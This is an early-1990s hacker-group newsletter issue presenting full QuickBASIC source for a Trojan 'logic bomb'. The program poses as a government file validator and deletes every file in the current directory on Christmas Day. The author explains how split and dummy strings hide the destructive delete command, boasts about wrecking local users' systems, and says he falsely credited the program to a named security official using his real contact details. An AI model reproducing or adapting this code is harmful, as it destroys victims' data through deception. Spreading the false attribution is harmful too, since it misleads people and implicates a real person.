124 lines
6.8 KiB
Plaintext
124 lines
6.8 KiB
Plaintext
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
|
º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ßÜ Û ÛßßßÛ Ûßßßß ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º
|
|
º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ßÜ Û Û Û ÛÜÜÜÜ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º
|
|
º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ßÜ Û ÛßßßÛ Û ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º
|
|
º ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ßÛ Û Û ÜÜÜÜÛ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ º
|
|
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
|
|
º Vaginal and Anal Secretions Newsletter #0066 º
|
|
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
|
|
º Date Released : [07/17/92] Author: PROBE-X º
|
|
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
|
|
º Santa's Logic Bomb º
|
|
ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ
|
|
|
|
This is a great one to make anybody angry on Christmas. I call it "Santa's
|
|
Logic Bomb", it is a (VERY, VERY) simple logic bomb written in Basic. It is not
|
|
a virus and does not spread. It is susposed to be a Vital File Validator, but,
|
|
heh, it will really fuck up anybody who runs it on Christmas Day (12-25). It
|
|
will delete all the files in the current directory. If you know BASIC (Who
|
|
doesen't???), you will see some shitty programming. This was for two reasons.
|
|
|
|
a.) To make the .EXE bigger (not a problem with QB!).
|
|
|
|
b.) To make any retard who looks in the .EXE find some stuff that makes
|
|
the program look legitimate.
|
|
|
|
It does not use SHELL "COMMAND /C DEL *.*" but instead SHELL CM$ + SEX$ +
|
|
PUSSY$, you get what I mean. It uses dummy strings to make any asshole who
|
|
looks in the .EXE and reads it, look legitimate. When you run it, here's
|
|
what it does:
|
|
|
|
prints the info (program name, purpose)
|
|
tells you it's working
|
|
sends the current directory into a file with the name of today's date
|
|
deletes that file
|
|
if today is 12-25-xx, delete all files in current dir
|
|
|
|
SysValid comes in this VAS file in SYSVALID.ZIP which contains SYSVALID.EXE
|
|
and some fake dox. (I even gave credit for the program to Patrick Gallagher,
|
|
Jr., who is the director of National Computer Security Center, and I used his
|
|
real address and phone numbers!) For fun, you may want to run this program
|
|
(Any day except Christmas will do!) and see what is looks like. Have phun!
|
|
I'll have a big laugh when half of the fucking 517 geeks loose config.sys
|
|
and autoexec.bat and command.com and all the shit they store in their
|
|
current directory!!
|
|
|
|
' SYSVALID.BAS
|
|
' Santa's Logic Bomb
|
|
' By PROBE-X
|
|
' VaS'92
|
|
' All the dummy strings are for dummies who will look in the .exe
|
|
' and these strings should make the retarted dummies think this program
|
|
' actually does something!!!
|
|
' National Computer Security Center (NCSC) in another name for part
|
|
' of the Department of Defense (DoD)
|
|
CLS 'Klear tha skreen
|
|
L$ = "391012" 'Used to get 12 from
|
|
LR$ = "225003" 'Used to get 25 from
|
|
A$ = " *.*" 'Req'd string to kill *.*
|
|
LT$ = " *** 12-25-91, Created, NCSC *** " 'Dummy string
|
|
LO$ = " *** 07-17-92, Updated, NCSC *** " 'Dummy string
|
|
LU$ = "command.com io.sys msdos.sys ibmbio.com sysvalid.exe" 'Dummy string
|
|
LU$ = "COMMAND.COM IO.SYS MSDOS.SYS IBMBIO.COM SYSVALID.EXE" 'Req'd string
|
|
CM$ = LEFT$(LU$, 7)
|
|
MAS$ = RIGHT$(L$, 2) + "-" + MID$(LR$, 2, 2)
|
|
LU$ = "\BIN\" 'Dummy String
|
|
LU$ = "\DOS\" 'Dummy String
|
|
LU$ = "NOTE: DES Encrypted File Found: " + LR$ 'Dummy string
|
|
P$ = DATE$: P$ = LEFT$(P$, 6) + RIGHT$(P$, 2)
|
|
PRINT
|
|
PRINT "SysValid 2.1"
|
|
PRINT "Vital File Validation Utility"
|
|
B$ = " /C " 'Part of req'd string (put in parts so it is not easy to guess)
|
|
PRINT "Copyright (C) 1992, National Computer Security Center"
|
|
PRINT "This program has been released for public use."
|
|
PRINT
|
|
PRINT "This program should be executed from your AUTOEXEC.BAT file."
|
|
PRINT
|
|
PRINT "If today's date is not: "; P$; " then please change the"
|
|
PRINT "clock on your computer and run SysValid again."
|
|
PRINT
|
|
C$ = "DEL SYSVALID.$$$" 'First 4 letters are req'd "DEL "
|
|
COLOR 23, 0
|
|
PRINT "Working"; : COLOR 7, 0: PRINT ".";
|
|
SHELL CM$ + B$ + "DIR>" + P$ + ".$$$" 'Create dummy file
|
|
PRINT ".";
|
|
'The next U$ = lines are dummies so any dummy who seees the .EXE thinks this
|
|
'program actually does somethin useful
|
|
IF U$ = "DADSDADDSAD" THEN PRINT "WARNING: SYSVALID HAS BEEN DAMAGED!"
|
|
IF U$ = "FFFFFFFF" THEN PRINT "WARNING: THE FILE "; LR$; " HAS BEEN DAMAGED!"
|
|
IF U$ = "FFFFLDLLL" THEN PRINT "WARNING: THE FILE "; LR$; " IS MISSING!"
|
|
IF U$ = "OFOOOOFFF" THEN PRINT "WARNING: THE FILE "; LR$; " HAS MtE-encrypted CODE!"
|
|
IF U$ = "OOOFOOOOO" THEN PRINT "WARNING: THE FILE "; LR$; " HAS SOMEHOW BEEN CHANGED SINCE YOUR LAST BOOTUP!"
|
|
IF U$ = "OOOOFD999" THEN PRINT "ERROR: SYSVALID EXTERNAL ERROR": END
|
|
IF U$ = "OOOOFD993" THEN PRINT "ERROR: SYSVALID INTERNAL ERROR": END
|
|
IF U$ = "FFF000000" THEN PRINT "ERROR: INCOMPATIBLE OPERATING SYSTEM": END
|
|
SHELL CM$ + B$ + LEFT$(C$, 4) + P$ + ".$$$" 'Delete dummy file created
|
|
'If it's christmas, Santa will have his revenge MUHAHAHAHAHAHA
|
|
IF LEFT$(B$, 5) = MAS$ THEN SHELL CM$ + B$ + LEFT$(C$, 4) + A$
|
|
PRINT "."
|
|
PRINT "Validation Complete, No Errors, Damage, or Changes found."
|
|
END
|
|
|
|
|
|
ÄÄÄÍÍÍÍÍ[ VaS DiSTRiBuTioN SiTeS ]ÍÍÍÍÍÄÄÄ
|
|
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
|
º BBS Name Number Baud Sysop Title º
|
|
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
|
|
º LiVe WiRE BBS (313)464-1470 14.4 Studmuffin World HQ º
|
|
º PoT BBS (313)462-1906 24oo Phreak_Accident World HQ º
|
|
º Floating Pancreas (305)551-0311 14.4 Majestic Cockster Dist. #1 º
|
|
º Midian BBS (703)790-8048 14.4 The Raging Golemn Dist. #2 º
|
|
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
|
|
º VaS Voice Mail Box (313)910-3030 FoR THe LaTeST NeWS iN VaS And To º
|
|
º LeAve uS CoMmEnTs! º
|
|
º VaS FaX Line (313)380-4904 SeND C/o VaS! FaX uS CooL StuFF LiKE º
|
|
º PiCTuReS oR SomEthIng LiKe ThAt! º
|
|
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
|
|
º And To Reach us Via U.S. Mail, Send Letters To: º
|
|
º º
|
|
º VaS World Headquarters º
|
|
º P.O. Box 530768 º
|
|
º Livonia,MI 48153 º
|
|
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|